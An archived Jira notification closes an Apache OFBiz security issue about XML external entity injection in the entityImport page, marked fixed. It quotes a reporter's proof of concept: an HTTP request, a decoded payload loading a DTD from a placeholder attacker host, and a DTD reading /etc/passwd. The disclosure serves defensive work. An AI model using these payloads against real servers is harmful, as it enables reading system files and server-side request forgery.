ofbiz-notifications mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Jacques Le Roux (Jira)" <j...@apache.org>
Subject [jira] [Closed] (OFBIZ-11195) XML Entity Injection in webtools/control/entityImport
Date Sun, 05 Apr 2020 09:29:00 GMT

     [ https://issues.apache.org/jira/browse/OFBIZ-11195?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]

Jacques Le Roux closed OFBIZ-11195.
-----------------------------------
    Fix Version/s: 17.12.02
                   18.12.01
         Assignee: Jacques Le Roux
       Resolution: Fixed

This is fixed with OFBIZ-11470

>  XML Entity Injection in webtools/control/entityImport
> ------------------------------------------------------
>
>                 Key: OFBIZ-11195
>                 URL: https://issues.apache.org/jira/browse/OFBIZ-11195
>             Project: OFBiz
>          Issue Type: Sub-task
>          Components: framework/webtools
>    Affects Versions: Trunk
>            Reporter: Jacques Le Roux
>            Assignee: Jacques Le Roux
>            Priority: Major
>             Fix For: 18.12.01, 17.12.02
>
>
> This was reported to the OFBiz security team by Jason Nordenstam from offensive-security.com.
We did not consider it as a real security issue because it requires authentication.
> {quote}
> Authenticated users can import XML documents containing DTDs. The SAX parser used by
the XML Data Import functionality does not have DTD parsing explicitly disabled which makes
it vulnerable to XXE attacks.
> The results of the import are not displayed in the page which means an 'error-based'
approach is needed to read local files. The parser will also resolve external entities so
this vulnerability can also be used for internal port scanning or server-side request forgery.
>  Affected URL:
>  /webtools/control/entityImport
> POC Example Request:
>  POST /webtools/control/entityImport HTTP/1.1
>  Host:<host>
>  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
>  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>  Accept-Language: en-US,en;q=0.5
>  Accept-Encoding: gzip, deflate
>  Referer: <host>/webtools/control/entityImport
>  Content-Type: application/x-www-form-urlencoded
>  Content-Length: 312
>  Cookie: JSESSIONID=66A4289C95C78E5E7977EFF796A7D05B.jvm1; OFBiz.Visitor=10178
>  Connection: close
>  Upgrade-Insecure-Requests: 1
> fulltext=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22utf-8%22%3F%3E%0D%0A%3C%21DOCTYPE+notfound+%5B%0D%0A+%3C%21ENTITY+%25+base+SYSTEM+%22http%3A%2F%2F<attacker_ip>%2Ferror.dtd%22%3E%0D%0A+%25base%3B%0D%0A+%25param1%3B+%0D%0A+%25external%3B%0D%0A%5D%3E%0D%0A%3Croot%3E%3Cfoo%3Ebar%3C%2Fbar%3E%3C%2Froot%3E%0D%0A
> Payload One Decoded:
>  <?xml version="1.0" encoding="utf-8"?>
>  <!DOCTYPE notfound [
>  <!ENTITY % base SYSTEM "http://<attacker_ip>/error.dtd">
>  %base;
>  %param1;
>  %external;
>  ]>
>  <root><foo>bar</bar></root>
> error.dtd on Attacking Machine:
>  <!ENTITY % payload SYSTEM "file:///etc/passwd">
>  <!ENTITY % param1 "<!ENTITY % external SYSTEM 'file:///banana/%payload;'>"
>
> {quote}
> We have reproduced it at [https://demo-stable.ofbiz.apache.org/webtools/control/entityImport]
>  using :
> {code:xml}
> <?xml version="1.0" encoding="utf-8"?>
>  <!DOCTYPE notfound [
>  <!ENTITY % base SYSTEM "https://demo-trunk.ofbiz.apache.org/images/error.dtd">
>  %base;
>  %param1;
>  %external;
>  ]>
>  <root><foo>bar</bar></root>
> {code}



--
This message was sent by Atlassian Jira
(v8.3.4#803005)

Mime
View raw message